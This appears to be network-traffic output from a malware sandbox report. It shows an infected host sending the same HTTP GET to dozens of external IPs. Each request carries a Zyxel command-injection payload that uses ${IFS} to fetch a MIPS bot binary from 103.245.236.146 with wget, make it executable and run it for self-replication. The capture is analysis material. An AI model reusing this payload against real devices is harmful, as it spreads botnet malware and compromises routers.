                                      Jan 19, 2024 17:29:31.746573925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4046192.168.2.145912642.237.30.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746611118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4047192.168.2.1433920155.21.79.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746632099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4048192.168.2.145749618.141.246.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746656895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4049192.168.2.1443530129.57.29.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746704102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4050192.168.2.14589608.53.85.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746740103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4051192.168.2.1456094108.64.153.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746771097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4052192.168.2.1436086117.226.40.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746793985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4053192.168.2.1459974117.28.132.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746825933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4054192.168.2.145958643.231.22.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746871948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4055192.168.2.143907491.112.112.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746927977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4056192.168.2.1445350203.15.7.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746932030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4057192.168.2.1442504191.77.94.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746970892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4058192.168.2.1437740108.192.29.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746990919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4059192.168.2.1436818113.167.116.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.746994972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4060192.168.2.145102269.31.70.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747015953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4061192.168.2.1444480144.252.141.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747054100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4062192.168.2.143742651.140.133.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747104883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4063192.168.2.1437920210.180.111.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747145891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4064192.168.2.1435738147.124.174.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747185946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4065192.168.2.1454084217.227.124.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747219086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4066192.168.2.1459016146.205.161.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747298956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4067192.168.2.1451654221.122.50.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747342110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4068192.168.2.144851268.37.196.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747363091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4069192.168.2.144444680.160.181.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747386932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4070192.168.2.144955685.58.30.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747400999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4071192.168.2.1438092210.173.249.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747443914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4072192.168.2.144035638.119.155.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747477055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4073192.168.2.143976877.140.216.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747528076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4074192.168.2.1450820123.79.35.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747558117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4075192.168.2.1460990222.32.253.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747632980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4076192.168.2.144618470.218.235.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747653961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4077192.168.2.1448392116.54.13.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747674942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4078192.168.2.1442440222.185.239.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747710943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4079192.168.2.145391280.246.22.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747736931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4080192.168.2.1433780134.209.13.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747757912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4081192.168.2.1445886148.131.254.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747781992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4082192.168.2.144993071.1.11.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747854948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4083192.168.2.144435497.73.2.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747855902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4084192.168.2.1436414192.127.215.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747905970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4085192.168.2.144062873.5.234.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747953892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4086192.168.2.1447528222.27.151.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.747987986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4087192.168.2.1442860197.225.245.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748027086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4088192.168.2.1441354173.199.139.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748033047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4089192.168.2.1433132129.199.225.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748065948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4090192.168.2.145108493.197.246.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748097897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4091192.168.2.1460648162.9.207.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748169899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4092192.168.2.144432419.67.166.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748193026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4093192.168.2.1445500145.51.55.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748229027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4094192.168.2.1454768124.219.20.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748251915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4095192.168.2.1454224130.142.86.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748308897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4096192.168.2.14479782.197.89.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748368025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4097192.168.2.1446654132.187.15.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748394012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4098192.168.2.1446378117.2.212.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748425007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4099192.168.2.1441086102.254.58.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748452902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4100192.168.2.145980276.143.20.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748497009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4101192.168.2.1437030192.184.116.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748526096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4102192.168.2.14577849.3.217.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748555899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4103192.168.2.1441110211.208.220.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748589039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4104192.168.2.1437334108.149.208.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748630047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4105192.168.2.1454184165.234.232.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748681068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4106192.168.2.1459078123.198.232.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748708010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4107192.168.2.1437610219.18.157.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748740911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4108192.168.2.1441062115.97.142.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.748794079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4109192.168.2.14371265.159.72.92443
                                      TimestampBytes transferredDirectionData
